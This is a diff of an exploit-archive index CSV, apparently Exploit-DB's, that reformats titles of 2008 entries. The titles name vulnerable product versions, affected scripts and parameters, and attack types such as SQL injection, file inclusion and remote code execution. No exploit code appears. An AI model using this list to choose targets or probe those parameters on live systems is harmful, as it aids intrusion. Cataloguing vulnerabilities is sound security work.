Exploit",2008-04-04,qaaz,sco,local,0 5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - mcd Local Root Exploit",2008-04-04,qaaz,sco,local,0 -5358,platforms/php/webapps/5358.pl,"XPOZE Pro <= 3.05 (reed) Remote SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 +5358,platforms/php/webapps/5358.pl,"XPOZE Pro <= 3.05 - (reed) Remote SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone (cat_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0 +5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 - (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0 5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 DSR File Local BoF Exploit",2008-04-04,shinnai,windows,local,0 5362,platforms/php/webapps/5362.txt,"Comdev News Publisher Remote SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5363,platforms/php/webapps/5363.txt,"Affiliate Directory (cat_id) Remote SQL Injection Vulnerbility",2008-04-04,t0pP8uZz,php,webapps,0 -5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 (incl_page) Remote File Inclusion",2008-04-04,JIKO,php,webapps,0 +5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - (incl_page) Remote File Inclusion",2008-04-04,JIKO,php,webapps,0 5366,platforms/solaris/remote/5366.rb,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit (Metasploit)",2008-04-04,I)ruid,solaris,remote,0 -5367,platforms/php/webapps/5367.pl,"PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 -5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 (id_art) Remote SQL Injection",2008-04-04,"Virangar Security",php,webapps,0 -5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 (lng) Local File Inclusion",2008-04-04,w0cker,php,webapps,0 +5367,platforms/php/webapps/5367.pl,"PIGMy-SQL <= 1.4.1 - (getdata.php id) Blind SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 +5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - (id_art) Remote SQL Injection",2008-04-04,"Virangar Security",php,webapps,0 +5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - (lng) Local File Inclusion",2008-04-04,w0cker,php,webapps,0 5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 Change User Password",2008-04-05,"Virangar Security",php,webapps,0 5371,platforms/php/webapps/5371.txt,"Entertainment Directory <= 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5372,platforms/php/webapps/5372.txt,"Easynet Forum Host (forum.php forum) SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 - Multiple Remote SQL Injection Vulnerabilities",2008-04-05,U238,asp,webapps,0 -5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 (cat_id) Remote SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - (cat_id) Remote SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5375,platforms/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,php,webapps,0 5376,platforms/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection Exploit",2008-04-05,t0pP8uZz,php,webapps,0 -5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 (cat_id) Remote SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5378,platforms/php/webapps/5378.txt,"Software Index 1.1 (cid) Remote SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - (cat_id) Remote SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - (cid) Remote SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - Remote SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0 5380,platforms/php/webapps/5380.txt,"Blog PixelMotion (sauvBase.php) Arbitrary Database Backup",2008-04-06,JIKO,php,webapps,0 5381,platforms/php/webapps/5381.txt,"Blog PixelMotion (modif_config.php) Remote File Upload",2008-04-06,JIKO,php,webapps,0 @@ -5022,27 +5022,27 @@ id,file,description,date,author,platform,type,port 5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow Exploit",2008-04-06,"INetCop Security",linux,remote,80 5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,php,webapps,0 5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,php,webapps,0 -5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 (id) Remote SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 +5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - (id) Remote SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers (project) Remote SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5391,platforms/php/webapps/5391.php,"Drake CMS <= 0.4.11 - Remote Blind SQL Injection Exploit",2008-04-07,EgiX,php,webapps,0 -5392,platforms/php/webapps/5392.php,"LinPHA <= 1.3.3 (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0 -5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 -5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 +5392,platforms/php/webapps/5392.php,"LinPHA <= 1.3.3 - (maps plugin) Remote Command Execution Exploit",2008-04-07,EgiX,php,webapps,0 +5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 +5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - (NeffyLauncher.dll) Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php file) File Disclosure",2008-04-07,Stack,php,webapps,0 5400,platforms/php/webapps/5400.txt,"724CMS <= 4.01 Enterprise (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 -5401,platforms/php/webapps/5401.txt,"My Gaming Ladder <= 7.5 (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5401,platforms/php/webapps/5401.txt,"My Gaming Ladder <= 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5402,platforms/php/webapps/5402.txt,"iScripts SocialWare (id) Remote SQL Injection Vulnerbility",2008-04-07,t0pP8uZz,php,webapps,0 5404,platforms/php/webapps/5404.php,"phpTournois <= G4 - Remote File Upload/Code Execution Exploit",2008-04-08,"Charles Fol",php,webapps,0 5405,platforms/php/webapps/5405.txt,"exbb <= 0.22 - (LFI/RFI) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 -5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 (editlink.php id) Remote SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 +5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - (editlink.php id) Remote SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 5407,platforms/php/webapps/5407.php,"FLABER <= 1.1 RC1 - Remote Command Execution Exploit",2008-04-08,EgiX,php,webapps,0 5408,platforms/php/webapps/5408.pl,"LokiCMS <= 0.3.3 - Remote Command Execution Exploit",2008-04-08,girex,php,webapps,0 5409,platforms/asp/webapps/5409.txt,"SuperNET Shop 1.0 - Remote SQL Injection Vulnerabilities",2008-04-08,U238,asp,webapps,0 -5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x (matchid) Remote SQL Injection",2008-04-08,0in,php,webapps,0 +5410,platforms/php/webapps/5410.txt,"Prediction Football 1.x - (matchid) Remote SQL Injection",2008-04-08,0in,php,webapps,0 5411,platforms/php/webapps/5411.txt,"Koobi Pro 6.25 links Remote SQL Injection",2008-04-08,S@BUN,php,webapps,0 5412,platforms/php/webapps/5412.txt,"Koobi Pro 6.25 shop Remote SQL Injection",2008-04-08,S@BUN,php,webapps,0 5413,platforms/php/webapps/5413.txt,"Koobi Pro 6.25 gallery Remote SQL Injection",2008-04-08,S@BUN,php,webapps,0 @@ -5054,31 +5054,31 @@ id,file,description,date,author,platform,type,port 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection Vulnerabilities",2008-04-09,"Virangar Security",php,webapps,0 -5422,platforms/php/webapps/5422.pl,"LiveCart <= 1.1.1 (category id) Blind SQL Injection Exploit",2008-04-10,irvian,php,webapps,0 +5422,platforms/php/webapps/5422.pl,"LiveCart <= 1.1.1 - (category id) Blind SQL Injection Exploit",2008-04-10,irvian,php,webapps,0 5423,platforms/php/webapps/5423.txt,"Ksemail (index.php language) Local File Inclusion",2008-04-10,dun,php,webapps,0 5424,platforms/linux/local/5424.txt,"Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit",2008-04-10,"Albert Sellares",linux,local,0 -5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 +5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 5426,platforms/php/webapps/5426.txt,"RX Maxsoft (popup_img.php fotoID) Remote SQL Injection",2008-04-10,S@BUN,php,webapps,0 5427,platforms/windows/dos/5427.pl,"Borland InterBase 2007 - ibserver.exe Buffer Overflow PoC",2008-04-11,"Liu Zhen Hua",windows,dos,0 5428,platforms/php/webapps/5428.txt,"PHPKB 1.5 Knowledge Base (ID) SQL Injection",2008-04-11,parad0x,php,webapps,0 5429,platforms/php/webapps/5429.txt,"newsoffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager <= 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 5431,platforms/php/webapps/5431.txt,"Joomla Component joomlaXplorer <= 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 -5432,platforms/php/webapps/5432.txt,"phpAddressBook 2.11 (view.php id) SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 +5432,platforms/php/webapps/5432.txt,"phpAddressBook 2.11 - (view.php id) SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 5433,platforms/php/webapps/5433.txt,"CcMail <= 1.0.1 Insecure Cookie Handling",2008-04-12,t0pP8uZz,php,webapps,0 5434,platforms/php/webapps/5434.pl,"1024 CMS <= 1.4.2 - Local File Inclusion / Blind SQL Injection Exploit",2008-04-13,girex,php,webapps,0 5435,platforms/php/webapps/5435.txt,"Joomla Component com_extplorer <= 2.0.0 RC2 - Local Directory Traversal",2008-04-13,Houssamix,php,webapps,0 -5436,platforms/php/webapps/5436.txt,"Pollbooth <= 2.0 (pollID) Remote SQL Injection",2008-04-13,S@BUN,php,webapps,0 +5436,platforms/php/webapps/5436.txt,"Pollbooth <= 2.0 - (pollID) Remote SQL Injection",2008-04-13,S@BUN,php,webapps,0 5437,platforms/php/webapps/5437.txt,"cpcommerce 1.1.0 - (XSS/LFI) Multiple Vulnerabilities",2008-04-13,BugReport.IR,php,webapps,0 -5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 (XCWD) Denial of Service Exploit",2008-04-13,j0rgan,windows,dos,0 +5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - (XCWD) Denial of Service Exploit",2008-04-13,j0rgan,windows,dos,0 5439,platforms/php/webapps/5439.txt,"PostCard 1.0 - Remote Insecure Cookie Handling",2008-04-13,t0pP8uZz,php,webapps,0 5440,platforms/php/webapps/5440.php,"Mumbo Jumbo Media OP4 - Remote Blind SQL Injection Exploit",2008-04-13,Lidloses_Auge,php,webapps,0 5441,platforms/php/webapps/5441.txt,"SmallBiz 4 Seasons CMS Remote SQL Injection",2008-04-14,cO2,php,webapps,0 5442,platforms/windows/local/5442.cpp,"Microsoft Windows GDI - Image Parsing Stack Overflow Exploit (MS08-021)",2008-04-14,Lamhtz,windows,local,0 5443,platforms/php/webapps/5443.txt,"SmallBiz eShop (content_id) Remote SQL Injection",2008-04-14,Stack,php,webapps,0 -5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 (index.php cat) SQL Injection",2008-04-14,"SoSo H H",php,webapps,0 +5444,platforms/php/webapps/5444.txt,"BosClassifieds 3.0 - (index.php cat) SQL Injection",2008-04-14,"SoSo H H",php,webapps,0 5445,platforms/windows/remote/5445.cpp,"HP OpenView NNM 7.5.1 - ovalarmsrv.exe Remote Overflow Exploit",2008-04-14,Heretic2,windows,remote,2954 -5446,platforms/php/webapps/5446.txt,"BosNews 4.0 (article) Remote SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 +5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) Remote SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 5447,platforms/php/webapps/5447.txt,"Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple Remote SQL Injection Vulnerabilities",2008-04-14,JosS,php,webapps,0 5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 poll Remote SQL Injection",2008-04-14,S@BUN,php,webapps,0 5449,platforms/php/webapps/5449.php,"KwsPHP (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0 @@ -5089,7 +5089,7 @@ id,file,description,date,author,platform,type,port 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - Remote SQL Injection (2)",2008-04-15,cO2,php,webapps,0 5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 SRT File Buffer Overflow PoC",2008-04-16,j0rgan,windows,dos,0 5456,platforms/asp/webapps/5456.txt,"carbon communities <= 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 -5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials <= 2.1 (id) SQL Injection",2008-04-16,cO2,php,webapps,0 +5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials <= 2.1 - (id) SQL Injection",2008-04-16,cO2,php,webapps,0 5458,platforms/linux/dos/5458.txt,"xine-lib <= 1.1.12 NSF demuxer Stack Overflow PoC",2008-04-16,"Guido Landi",linux,dos,0 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0 @@ -5099,28 +5099,28 @@ id,file,description,date,author,platform,type,port 5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart (category_ID) SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 5465,platforms/php/webapps/5465.txt,"2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,php,webapps,0 5466,platforms/php/webapps/5466.pl,"OpenInvoice 0.9 - Arbitrary Change User Password Exploit",2008-04-18,t0pP8uZz,php,webapps,0 -5467,platforms/php/webapps/5467.txt,"PhShoutBox <= 1.5 (final) Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps,0 -5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 (contact.php id) SQL Injection",2008-04-18,t0pP8uZz,php,webapps,0 -5469,platforms/php/webapps/5469.txt,"AllMyGuests <= 0.4.1 (AMG_id) Remote SQL Injection",2008-04-19,Player,php,webapps,0 +5467,platforms/php/webapps/5467.txt,"PhShoutBox <= 1.5 - (final) Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps,0 +5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 - (contact.php id) SQL Injection",2008-04-18,t0pP8uZz,php,webapps,0 +5469,platforms/php/webapps/5469.txt,"AllMyGuests <= 0.4.1 - (AMG_id) Remote SQL Injection",2008-04-19,Player,php,webapps,0 5470,platforms/php/webapps/5470.py,"PHP-Fusion <= 6.01.14 - Remote Blind SQL Injection Exploit",2008-04-19,The:Paradox,php,webapps,0 5471,platforms/php/webapps/5471.txt,"Apartment Search Script (listtest.php r) SQL Injection",2008-04-19,Crackers_Child,php,webapps,0 5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 subtitle Buffer Overflow PoC",2008-04-19,grzdyl,windows,dos,0 5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe (detail.php id) SQL Injection",2008-04-19,S@BUN,php,webapps,0 -5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 (class) Local File Inclusion Vulnerabilities (php5)",2008-04-19,KnocKout,php,webapps,0 -5475,platforms/asp/webapps/5475.txt,"W1L3D4 Philboard 1.0 (philboard_reply.asp) SQL Injection",2008-04-20,U238,asp,webapps,0 +5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - (class) Local File Inclusion Vulnerabilities (php5)",2008-04-19,KnocKout,php,webapps,0 +5475,platforms/asp/webapps/5475.txt,"W1L3D4 Philboard 1.0 - (philboard_reply.asp) SQL Injection",2008-04-20,U238,asp,webapps,0 5476,platforms/php/webapps/5476.txt,"HostDirectory Pro Insecure Cookie Handling",2008-04-20,Crackers_Child,php,webapps,0 -5477,platforms/php/webapps/5477.txt,"Kubelance 1.6.4 (ipn.php i) Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0 +5477,platforms/php/webapps/5477.txt,"Kubelance 1.6.4 - (ipn.php i) Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0 5478,platforms/php/webapps/5478.txt,"acidcat CMS 3.4.1 - Multiple Vulnerabilities",2008-04-20,BugReport.IR,php,webapps,0 5479,platforms/windows/local/5479.txt,"Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit",2008-04-21,c0ntex,windows,local,0 -5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 (view.asp id) Remote SQL Injection",2008-04-21,U238,php,webapps,0 -5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 (id) Remote SQL Injection",2008-04-21,ZoRLu,php,webapps,0 +5480,platforms/php/webapps/5480.txt,"BlogWorx 1.0 - (view.asp id) Remote SQL Injection",2008-04-21,U238,php,webapps,0 +5481,platforms/php/webapps/5481.txt,"Crazy Goomba 1.2.1 - (id) Remote SQL Injection",2008-04-21,ZoRLu,php,webapps,0 5482,platforms/asp/webapps/5482.py,"RedDot CMS 7.5 - (LngId) Remote SQL Injection Exploit",2008-04-21,"IRM Plc.",asp,webapps,0 -5483,platforms/php/webapps/5483.txt,"TR News 2.1 (nb) Remote SQL Injection",2008-04-21,His0k4,php,webapps,0 +5483,platforms/php/webapps/5483.txt,"TR News 2.1 - (nb) Remote SQL Injection",2008-04-21,His0k4,php,webapps,0 5484,platforms/php/webapps/5484.txt,"Joomla Component FlippingBook 1.0.4 - SQL Injection",2008-04-22,cO2,php,webapps,0 5485,platforms/php/webapps/5485.pl,"Web Calendar <= 4.1 - Blind SQL Injection Exploit",2008-04-22,t0pP8uZz,php,webapps,0 5486,platforms/php/webapps/5486.txt,"WordPress Plugin Spreadsheet <= 0.6 - SQL Injection",2008-04-22,1ten0.0net1,php,webapps,0 -5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 (index.php ID_loc) SQL Injection",2008-04-23,JIKO,php,webapps,0 -5488,platforms/php/webapps/5488.txt,"Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection",2008-04-23,str0xo,php,webapps,0 +5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 - (index.php ID_loc) SQL Injection",2008-04-23,JIKO,php,webapps,0 +5488,platforms/php/webapps/5488.txt,"Joomla Component Filiale 1.0.4 - (idFiliale) SQL Injection",2008-04-23,str0xo,php,webapps,0 5489,platforms/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite Exploit",2008-04-23,"ilion security",windows,remote,0 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script (spages.php) Remote Code Execution Exploit",2008-04-23,Inphex,php,webapps,0 5491,platforms/php/webapps/5491.txt,"Joomla Community Builder <= 1.0.1 - Blind SQL Injection",2008-04-23,$hur!k'n,php,webapps,0 @@ -5134,9 +5134,9 @@ id,file,description,date,author,platform,type,port 5499,platforms/php/webapps/5499.txt,"siteman 2.x - (exec/LFI/XSS) Multiple Vulnerabilities",2008-04-26,"Khashayar Fereidani",php,webapps,0 5500,platforms/php/webapps/5500.txt,"PostNuke Module pnFlashGames <= 2.5 - SQL Injection Vulnerabilities",2008-04-26,Kacper,php,webapps,0 5501,platforms/php/webapps/5501.txt,"Content Management System for Phprojekt 0.6.1 - RFI Vulnerabiltiies",2008-04-26,RoMaNcYxHaCkEr,php,webapps,0 -5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 (postview.php) Remote SQL Injection Exploit",2008-04-26,U238,php,webapps,0 +5502,platforms/php/webapps/5502.pl,"Clever Copy 3.0 - (postview.php) Remote SQL Injection Exploit",2008-04-26,U238,php,webapps,0 5503,platforms/asp/webapps/5503.txt,"Angelo-Emlak 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-04-26,U238,asp,webapps,0 -5504,platforms/php/webapps/5504.txt,"PHP Forge <= 3 beta 2 (id) Remote SQL Injection",2008-04-26,JIKO,php,webapps,0 +5504,platforms/php/webapps/5504.txt,"PHP Forge <= 3 beta 2 - (id) Remote SQL Injection",2008-04-26,JIKO,php,webapps,0 5505,platforms/php/webapps/5505.txt,"RunCMS Module MyArticles 0.6 Beta-1 SQL Injection",2008-04-26,Cr@zy_King,php,webapps,0 5506,platforms/php/webapps/5506.txt,"PHPizabi 0.848b C1 HFP3 - Database Information Disclosure",2008-04-26,YOUCODE,php,webapps,0 5507,platforms/asp/webapps/5507.txt,"megabbs forum 2.2 - (SQL/XSS) Multiple Vulnerabilities",2008-04-27,BugReport.IR,asp,webapps,0 @@ -5147,16 +5147,16 @@ id,file,description,date,author,platform,type,port 5512,platforms/php/webapps/5512.pl,"Joomla Component com_alphacontent Blind SQL Injection Exploit",2008-04-27,cO2,php,webapps,0 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection Exploit",2008-04-27,cO2,php,webapps,0 5514,platforms/php/webapps/5514.pl,"Joomla Component paxxgallery 0.2 - (gid) Blind SQL Injection Exploit",2008-04-27,ZAMUT,php,webapps,0 -5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0 +5515,platforms/windows/dos/5515.txt,"GroupWise 7.0 - (mailto: scheme) Buffer Overflow PoC",2008-04-28,"Juan Yacubian",windows,dos,0 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index (directory.php cat_id) - SQL Injection",2008-04-28,K-159,php,webapps,0 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection",2008-04-28,K-159,php,webapps,0 5518,platforms/windows/local/5518.txt,"Microsoft Windows XP SP2 - (Win32k.sys) Privilege Escalation Exploit (MS08-025)",2008-04-28,"Ruben Santamarta ",windows,local,0 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0 -5520,platforms/php/webapps/5520.txt,"Joovili 3.1 (browse.videos.php category) SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0 +5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - (browse.videos.php category) SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure",2008-04-29,"Roberto Suggi Liverani",php,webapps,0 5522,platforms/php/webapps/5522.txt,"LokiCMS <= 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,php,webapps,0 5523,platforms/php/webapps/5523.txt,"Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities",2008-04-30,GoLd_M,php,webapps,0 -5524,platforms/php/webapps/5524.txt,"OxYProject 0.85 (edithistory.php) Remote Code Execution",2008-04-30,GoLd_M,php,webapps,0 +5524,platforms/php/webapps/5524.txt,"OxYProject 0.85 - (edithistory.php) Remote Code Execution",2008-04-30,GoLd_M,php,webapps,0 5525,platforms/php/webapps/5525.txt,"Harris WapChat 1 - Multiple Remote File Inclusion Vulnerabilities",2008-04-30,k1n9k0ng,php,webapps,0 5526,platforms/php/webapps/5526.txt,"interact 2.4.1 - Multiple Remote File Inclusion Vulnerabilities",2008-04-30,RoMaNcYxHaCkEr,php,webapps,0 5527,platforms/php/webapps/5527.pl,"Joomla Component Webhosting (catid) Blind SQL Injection Exploit",2008-05-01,cO2,php,webapps,0 @@ -5164,48 +5164,48 @@ id,file,description,date,author,platform,type,port 5529,platforms/php/webapps/5529.txt,"vlbook 1.21 - (XSS/LFI) Multiple Vulnerabilities",2008-05-01,"Khashayar Fereidani",php,webapps,0 5530,platforms/windows/remote/5530.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Remote BoF Exploit",2008-05-02,lhoang8500,windows,remote,0 5531,platforms/php/webapps/5531.txt,"Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities",2008-05-02,InjEctOr5,php,webapps,0 -5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 (boxpop.php) Remote Code Execution",2008-05-02,Cod3rZ,php,webapps,0 +5532,platforms/php/webapps/5532.txt,"ItCMS 1.9 - (boxpop.php) Remote Code Execution",2008-05-02,Cod3rZ,php,webapps,0 5533,platforms/php/webapps/5533.txt,"BlogMe PHP (comments.php id) SQL Injection",2008-05-03,His0k4,php,webapps,0 5534,platforms/multiple/remote/5534.txt,"HLDS WebMod 0.48 - Multiple Remote Vulnerabilties",2008-05-03,"Luigi Auriemma",multiple,remote,0 5535,platforms/php/webapps/5535.txt,"Smartblog (index.php tid) Remote SQL Injection",2008-05-03,His0k4,php,webapps,0 -5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 (rconpass) Remote Heap Overflow Exploit",2008-05-03,SkOd,windows,remote,0 +5536,platforms/windows/remote/5536.php,"HLDS WebMod 0.48 - (rconpass) Remote Heap Overflow Exploit",2008-05-03,SkOd,windows,remote,0 5537,platforms/php/webapps/5537.txt,"phpDirectorySource 1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-05-03,InjEctOr5,php,webapps,0 5538,platforms/php/webapps/5538.txt,"cplinks 1.03 - (bypass/SQL/xxs) Multiple Vulnerabilities",2008-05-04,InjEctOr5,php,webapps,0 -5539,platforms/php/webapps/5539.txt,"ScorpNews 1.0 (example.php site) Remote File Inclusion",2008-05-04,Silver,php,webapps,0 -5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit <= 1.4.0 (ParentId) Remote SQL Injection Exploit",2008-05-04,JosS,php,webapps,0 +5539,platforms/php/webapps/5539.txt,"ScorpNews 1.0 - (example.php site) Remote File Inclusion",2008-05-04,Silver,php,webapps,0 +5540,platforms/php/webapps/5540.pl,"Scout Portal Toolkit <= 1.4.0 - (ParentId) Remote SQL Injection Exploit",2008-05-04,JosS,php,webapps,0 5541,platforms/php/webapps/5541.txt,"PostNuke Module pnEncyclopedia <= 0.2.0 - SQL Injection",2008-05-05,K-159,php,webapps,0 -5542,platforms/php/webapps/5542.txt,"Online Rental Property Script <= 4.5 (pid) SQL Injection",2008-05-05,K-159,php,webapps,0 +5542,platforms/php/webapps/5542.txt,"Online Rental Property Script <= 4.5 - (pid) SQL Injection",2008-05-05,K-159,php,webapps,0 5543,platforms/php/webapps/5543.txt,"Anserv Auction XL (viewfaqs.php cat) - SQL 